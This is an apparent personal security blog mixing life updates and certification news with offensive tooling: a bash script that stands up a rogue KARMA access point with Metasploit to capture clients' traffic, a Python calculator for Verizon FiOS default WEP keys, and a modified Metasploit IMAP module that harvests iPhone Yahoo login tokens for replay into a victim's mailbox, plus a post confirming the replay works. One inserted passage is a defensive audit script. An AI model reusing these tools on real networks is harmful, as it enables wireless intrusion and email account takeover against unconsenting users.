Blueshirt CT

No excellent soul is exempt from a mixture of madness.

- Aristotle

10 April

New URL

I let the old domain www.mariod.net expire - was tired of GoDaddy adding bullshit charges for renewal. Meh..
01:41:20 AM - Mario -

16 January

Long time no post

So it has been close to a year since I posted anything. During that time I deployed to Africa, transferred to Japan and then went back on deployment. Got to spend some time in Australia, Vietnam, and a few other places I've never been. Good stuff.

A big reason for the lack of updates on here is that I finally got a Facebook account a while back. I still plan to post tech items (scripts, research items, etc), but unfortunately I don't have much spare time anymore to really dig into the nitty-gritty of things. My new job is more of a mid-level advisor position vice day-to-day operations so I'm not as up-to-speed on the latest network security developments as I would like to be.

Anyways, for those of you who know me and haven't already done so find me on Facebook. If you don't know me I can still be reached at mario@mariod.net if needed.
08:58:54 AM - Mario -

11 April

My karmetasploit script..


#!/bin/bash
#
# karma.sh by mario
# 11 April 09
#
# Bash script to launch airbase-ng & (Kar)Metasploit. This is customized for
# my hardware and BT4 install. At a minimum you will need to add an appropriate
# subnet to your dhcpd3 conf file. This is what I'm using:
#
#   subnet 192.168.2.0 netmask 255.255.255.0 {
#     range 192.168.2.2 192.168.2.25;
#     option broadcast-address 192.168.2.255;
#     option domain-name-servers 192.168.2.1;
#     option routers 192.168.2.1;
#   }
#
# Alternatively you could replace the call to dhcpd3 with a properly
# configured dnsmasq setup...this opens the door to auto-scanning clients as they connect
# (if you use dnsmasq make sure you comment out the fakedns portions of karma.rc).
#
# You will also need a valid essids.txt file since airbase-ng is called with the -E flag.
#
# You may want to start up tcpdump or Wireshark on at0 once this script finishes...the
# script runs tcpdump automatically for you.
#
# Log files are overwritten automatically every time this script is run. Files generated:
#   karma.log
#   airbase.log
#   karma.pcap
#
# Airbase-ng, tcpdump, and dhcpd3 will continue to run after this script finishes.
# Uncomment the last two lines of the script if you wish these processes to terminate
# after you exit out of Metasploit.

if [ -z "$1" ]; then
    echo "Usage: $0 wireless_interface"
    exit 1
fi

## Does iwconfig throw an error? If so the interface name is probably wrong.
if iwconfig "$1" essid "" key off; then
    echo "Setting up monitor mode on $1"
else
    echo "Usage: $0 wireless_interface"
    exit 1
fi

## airmon-ng prints the name of the monitor interface it created (e.g. mon0)
mon=$(airmon-ng start "$1" | grep enabled | sed 's/)//' | awk '{print $5}')
ifconfig "$1" down
ifconfig "$mon" down

echo "Running macchanger"
macchanger -A "$1"
macchanger -A "$mon"
ifconfig "$1" up
ifconfig "$mon" up

echo "Starting airbase-ng (logging to airbase.log)"
airbase-ng -P -C 30 -E ~/essids.txt "$mon" | tee airbase.log &
sleep 5 ## Give airbase some time to start up at0

echo "Configuring tunnel interface at0"
ifconfig at0 up 192.168.2.1 netmask 255.255.255.0

echo "Starting tcpdump on at0 (saving to karma.pcap)"
tcpdump -s 0 -i at0 -w karma.pcap &

echo "Initiating DHCP daemon"
dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
ifconfig "$mon" mtu 1800 ## Supposedly fixes a bug in airbase

echo "Starting karmetasploit (logging to karma.log)"
msfconsole -r ~/karma.rc | tee karma.log

#pkill airbase
#pkill dhcpd3

11:39:18 PM - Mario -

27 March

My first Python script...

Actually, I stole the hard part from the Wikipedia article for base36 encoding and the logic from a writeup about Verizon's weak-ass default WEP keying scheme for their FIOS wireless routers.

Code:

#!/usr/bin/python
#
# vsux.py by mario
# 27 March 2009
#
# This code is based off of research posted at
# http://xkyle.com/2009/03/03/verizon-fios-wireless-key-calculator/
# about Verizon's ActionTec MI424-WR Rev. D routers. A combination of
# the MAC addy and default ESSID is used to create the WEP key. This
# script provides the two possible default WEP keys for this router.
#
# ballz!

import sys

def base36decode(text):
    # Base36 alphabet (from the Wikipedia base36 article); base36 is
    # case-insensitive, so the input is upper-cased before lookup
    CLIST = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"
    rv = pos = 0
    for char in reversed(text.upper()):
        rv += CLIST.find(char) * 36**pos
        pos += 1
    return rv

# If no arguments were given, print a helpful message
if len(sys.argv) != 2:
    print('Usage: ' + sys.argv[0] + ' ESSID')
    sys.exit(0)

# The reversed ESSID is decoded as base36 and rendered in hex; the two
# candidate keys differ only in the fixed prefix
hexpart = "%x" % base36decode(sys.argv[1][::-1])
key1 = "1801" + hexpart
key2 = "1f90" + hexpart
print(key1.upper())
print(key2.upper())
sys.exit(0)
08:27:41 PM - Mario -

23 March

Metasploit imap.rb module modification for iPhone Yahoo IMAP logins

Here's a link to an updated imap.rb to place in your /pentest/exploits/framework3/modules/auxiliary/server/capture directory (assuming you are using BT4 of course). If you run karmetasploit or the imap capture module as a standalone you should be able to snag iPhone Yahoo IMAP login tokens which you can replay for access to a victim's mailbox. I generally only need the first token, but sometimes both are needed.

I'm using netcat for now to get access, but there is a patch for KMail that allows you to use an email client to get at the data.

The bits I changed or added are in the on_client_data function (copied in its entirety below):


def on_client_data(c)
  data = c.get_once
  return if not data
  num,cmd,arg = data.strip.split(/\s+/, 3)
  arg ||= ""

  if(cmd.upcase == "CAPABILITY")
    c.put "* CAPABILITY IMAP4 IMAP4rev1 AUTH=XYMCOOKIE AUTH=XYMCOOKIEB64 AUTH=XYMPKI AUTH=XYMECOOKIE ID IDLE LOGIN-REFERRALS MAILBOX-REFERRALS NAMESPACE LITERAL+ UIDPLUS CHILDREN\r\n"
    c.put "#{num} OK CAPABILITY completed.\r\n"
  end

  if(cmd.upcase == "AUTHENTICATE" && arg.upcase == "XYMPKI")
    c.put "+ \r\n"
    cookie1 = c.get_once
    c.put "+ \r\n"
    cookie2 = c.get_once
    print_status("iPhone Yahoo email cookies sniffed\r\n")
    print_status("Cookie 1:\r\n#{cookie1}")
    print_status("Cookie 2:\r\n#{cookie2}\r\n")
    cookie1 = "empty"
    cookie2 = "empty"
    return
  end

  if(cmd.upcase == "LOGIN")
    @state[c][:user], @state[c][:pass] = arg.split(/\s+/, 2)

    report_auth_info(
      :host      => @state[c][:ip],
      :proto     => 'imap',
      :targ_host => datastore['SRVHOST'],
      :targ_port => datastore['SRVPORT'],
      :user      => @state[c][:user],
      :pass      => @state[c][:pass]
    )
    print_status("IMAP LOGIN #{@state[c][:name]} #{@state[c][:user]} / #{@state[c][:pass]}")
  end

  @state[c][:pass] = data.strip
  c.put "#{num} NO LOGIN FAILURE\r\n"
  return
end
01:54:15 AM - Mario -

20 January

Yes, you can replay the iPhone Yahoo email login

Yep. Just tried it from two different servers (a simple netcat to port 143 on 76.13.13.50) and was able to authenticate with the same tokens captured via tcpdump from earlier in the day. I was able to browse everything in my mailboxes. I don't know how long the tokens are good for though....
08:06:58 PM - Mario -

iPhone stuff

Yeah, I caved and bought some iPhone goodness the other day at Best Buy. Contrary to what the friendly salesman told me I wasn't able to tether it to my laptop. A little bit of research led me to the whole jailbreaking business and now I'm all up in the OS internals of my phone.

So, yes, I can tether my laptop if I really need to, but I'm doing it the ghetto SSH way that involves setting up an ad-hoc network and all that jazz. It does work, but you have to spend 10 mins getting all the settings right (ever tried to set up an ad-hoc network in Vista? All I can say is "goddamn...."). Lots of interesting things have been ported over to the iPhone - nmap, nc, tcpdump, etc., and they are all now resident on my new shiny.

Tcpdump in particular has been revealing. I set up a service (5 hours of my life gone figuring out that particular OSX weirdness...damn plist) that starts tcpdump listening on the 3G interface figuring setting it up on the WiFi side would generate too much pcap. Got about a quarter of a meg over the day. Some of it was from a "phone home" service I installed to track my shiny if I lose it and the rest was from IMAP.

Yeah, IMAP...as in fucking plain text protocol IMAP.

Apparently the iPhone uses IMAP to check in (looks like hourly) with Yahoo to see if you have anything interesting waiting for consumption. Here's the authentication part of the IMAP session:

* OK IMAP4rev1 server ready (3.5.39)
1 CAPABILITY
* CAPABILITY IMAP4rev1 LOGIN-REFERRALS AUTH=XYMCOOKIE AUTH=XYMCOOKIEB64 AUTH=XYMPKI AUTH=XYMECOOKIE ID
1 OK CAPABILITY completed
2 AUTHENTICATE XYMPKI
+
WT12PTEmbj01O [snipped a big chunk cuz I don't trust you leet h4x0r bastards out there] uZQ==
2 OK AUTHENTICATE completed


Interesting....Yahoo mail cookies? Sure enough, when I broke out the nice long base64-encoded authentication string passed from my iPhone to the Yahoo IMAP server it turned out to be:

Y=v=1&n=584b4pv95&l=c0h8e3_ah/o&p=m2k013000000&jb=27|45|5&r=9r&lg=en-US&intl=us&np=1; T=z=t8XdJBtCtdJBPkT3CBF14KkMjUzBjY3MDZOMDZPMzQ-&a=YAE&sk=DAANatN9q3o/y3&ks=EAAc93828l5XVk.tLf5vUq0Ig--~C&d=c2wBTlRJMEFURXdOekU1TnpFNE5ETSNR0tOWVVVRDRLWQFvawFaVzAtAXp6AXQ4WGRKQmdXQQF0aXABSFpxT2ZE; version=2.2 revision=5G77 cid=c48681958ba7f3817e7b9f67a5e8f6e8b ts=1232446688 sig=c2vEYfZIYOyLkhc5SxE4KbU7GyoDFMsaWg1a63cvN5deYgUuxJItdlDmltOgxPz+Gq0/Mv7ld2qoIKiv1Hju952KT/EbYy55kW5b/ryBqwp2ogYI9Ow= src=iphone

(note that I pared out a bunch of characters in case someone figures out how to break Yahoo's authentication scheme....the field names are untouched though - just the values, to include the number of characters, were diddled)

...and of course every email I received via my Yahoo account that day was pushed to my iPhone in the clear. Nice.
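As an added example (my code, not the author's), here is a small Python audit of an IMAP exchange shaped like the one above: it flags a LOGIN or AUTHENTICATE sent before STARTTLS and lists which cookie field names the base64 XYMPKI response exposes on the wire, without ever logging the values. The session and cookie values are constructed; only the field names follow the post.

```python
import base64
# Constructed sample of the cookie string the post decodes (field names from the post, values are placeholders)
SAMPLE_COOKIE = ("Y=v=1&n=EXAMPLE_N&l=EXAMPLE_L&p=EXAMPLE_P; "
                 "T=z=EXAMPLE_Z&a=YAE&sk=EXAMPLE_SK; version=2.2 src=iphone")
# Constructed exchange modelled on the post's capture; "S: "/"C: " are my direction labels, not IMAP
SAMPLE_SESSION = [
    "C: 1 CAPABILITY",
    "S: * CAPABILITY IMAP4rev1 LOGIN-REFERRALS AUTH=XYMCOOKIE AUTH=XYMPKI ID",
    "C: 2 AUTHENTICATE XYMPKI",
    "S: +",
    "C: " + base64.b64encode(SAMPLE_COOKIE.encode()).decode(),
    "S: 2 OK AUTHENTICATE completed",
]

def cookie_field_names(blob):
    # Names (never values) of cookies and sub-fields in a decoded "Y=...; T=..." blob
    names = []
    for cookie in blob.split("; "):
        name, _, value = cookie.partition("=")
        names.append(name)
        if "&" in value:
            names.extend(name + "." + sub.partition("=")[0] for sub in value.split("&"))
    return names

def audit_imap_session(lines):
    # Flag LOGIN/AUTHENTICATE sent before STARTTLS; for SASL, record which cookie fields the blob exposes
    report = {"cleartext_credentials": False, "mechanism": None, "exposed_fields": []}
    tls = awaiting_blob = False
    for line in lines:
        who, _, text = line.partition(": ")
        if who != "C":
            continue
        if awaiting_blob:  # bare line after the server's "+" is the SASL response
            awaiting_blob = False
            try:
                decoded = base64.b64decode(text, validate=True).decode("utf-8", "replace")
                report["exposed_fields"] = cookie_field_names(decoded)
            except ValueError:
                pass  # not base64: nothing to inspect
            continue
        _tag, _, rest = text.partition(" ")
        cmd, _, arg = rest.partition(" ")
        if cmd.upper() == "STARTTLS":
            tls = True
        elif cmd.upper() in ("LOGIN", "AUTHENTICATE"):
            report["cleartext_credentials"] = not tls
            if cmd.upper() == "AUTHENTICATE" and arg:
                report["mechanism"] = arg.split()[0].upper()
                awaiting_blob = True
    return report
```

Run over a real capture, a report with cleartext_credentials set and a populated exposed_fields list is exactly the condition the post describes: a session cookie good for replay, visible to anyone on the same open or WEP network.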

What about Gmail?

Guess what - Gmail is using secure IMAP. Go figure...that is why they are going to rule the world.

As far as I can tell there is no way to force the iPhone or Yahoo to use secure IMAP. Not a biggy on their private 3G network, but your email is ripe for the picking if you are using an open WiFi access point (or one running WEP, given the comparative ease with which it can be broken now). And yes, when you have a WiFi connection the iPhone still uses plain IMAP with Yahoo...but through the WiFi IP addy. If you aren't running WPA with a reasonably long (20+ characters) and complex password then you should disable Yahoo email on your phone. Your login info appears to be reasonably secure (might be a possibility of a replay attack that would allow someone to log in with your credentials, but I doubt it. When I have some spare time I'll try), but once again your actual email (the new ones and any you browse) is being passed in plain text.

WTF Yahoo?

If you are using Gmail you should be fine. If your adversary has a means to break secure imap then you have bigger worries than the security of your email...

I'll try to update this at some point with pretty pictures and pcap...maybe this weekend....

Oh, I'm doing Shmoocon labs this year! w00t?
07:43:29 PM - Mario -

19 October

Yay...I passed my CompTIA Linux+ certification

Passed the Linux+ exam yesterday. To prepare for it I bought and studied the Mike Meyers Linux+ Passport. The book was so-so; the biggest thing I got from it is that if you are a Debian/Ubuntu guy (like me) you had better start playing with Red Hat/Fedora Core before taking the exam. Fedora Core 9 is now running surprisingly well on my crappy-ass HP/Compaq $500 laptop.

Pretty logos for my certs...

[certification logo images]

I also have the Certified Reverse Engineering Analyst certification, but apparently no logos exist for that...

04:35:58 PM - Mario -

01 September

New web browser from Google?

Yes, this could be HUGE: Google Chrome

Or it could be a prank. Me thinks not though....

If you are looking for the www.googlechromebeta.com page click here.
04:14:33 PM - Mario -

22 August

Stupid rainbow table charset.txt problem

Ok,

So I just wasted several hours of my life trying to track down why Cain & Abel didn't like a set of NTLM rainbow tables I downloaded from mirror3.fpux.com. C&A kept throwing a "Verifying the file... (rainbow chain length verify fail, skipping)" error.

Turns out the file charset.txt in the Cain directory had an entry that didn't agree with the rainbow table description (loweralpha-numeric-all-space). After much mucking around and research (thanks Rajat!) I finally got it working by replacing the line

loweralpha-numeric-all-space= [abcdefghijklmnopqrstuvwxyzäöüß0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/ ]

with

loweralpha-numeric-all-space= [abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/ ]

The only diff was the stupid German(?) letters ä ö ü and ß. Hopefully this post will save someone else out there a headache....

Also, here is a fairly comprehensive password cracking guide by bofh28 I found posted on the remote-exploit.org forums.
02:50:53 AM - Mario -